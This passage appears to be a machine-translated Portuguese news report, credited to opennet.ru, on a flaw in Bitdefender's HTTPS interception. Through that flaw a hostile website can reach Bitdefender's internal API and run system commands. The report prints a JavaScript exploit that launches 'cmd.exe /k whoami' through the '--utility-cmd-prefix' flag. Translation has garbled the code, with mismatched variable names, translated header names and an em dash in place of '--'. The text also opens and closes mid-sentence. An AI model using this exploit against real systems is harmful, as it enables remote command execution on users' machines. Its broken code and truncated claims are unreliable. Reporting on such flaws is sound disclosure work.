Vladimir Palant, criador do Adblock Plus,
A causa do problema é que o antivírus Bitdefender realiza interceptação local do tráfego HTTPS, substituindo o certificado TLS original do site. Um certificado raiz adicional é instalado no sistema do cliente, o que permite ocultar o funcionamento do sistema de inspeção de tráfego utilizado. O antivírus se intromete no tráfego protegido e insere seu próprio código JavaScript em algumas páginas para implementar a função Safe Search e, em caso de problemas com o certificado de conexão segura, substitui a página de erro retornada pela sua própria. Como a nova página de erro é exibida em nome do servidor que está sendo aberto, outras páginas nesse servidor têm acesso total ao conteúdo inserido pelo Bitdefender.
Ao abrir um site controlado por um invasor, esse site pode enviar um XMLHttpRequest e fingir problemas com o certificado HTTPS ao responder, o que levará ao retorno de uma página de erro falsificada pelo Bitdefender. Como a página de erro é aberta no contexto do domínio do invasor, ele pode ler o conteúdo da página falsificada com os parâmetros do Bitdefender. A página fornecida pelo Bitdefender também contém uma chave de sessão que permite usar a API interna do Bitdefender para iniciar uma sessão separada do navegador Safepay, especificando sinalizadores de linha de comando arbitrários e para iniciar qualquer comando do sistema usando o “--utility-cmd-prefix” bandeira. Um exemplo de exploração (param1 e param2 são valores obtidos na página de erro):
var pedido = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Tipo de conteúdo", "aplicativo/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Recordemos que um estudo realizado em 2017
Apenas 11 dos 26 produtos forneciam conjuntos de criptografia atuais. 5 sistemas não verificaram certificados (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Os produtos Kaspersky Internet Security e Total Security foram sujeitos a ataques
Fonte: opennet.ru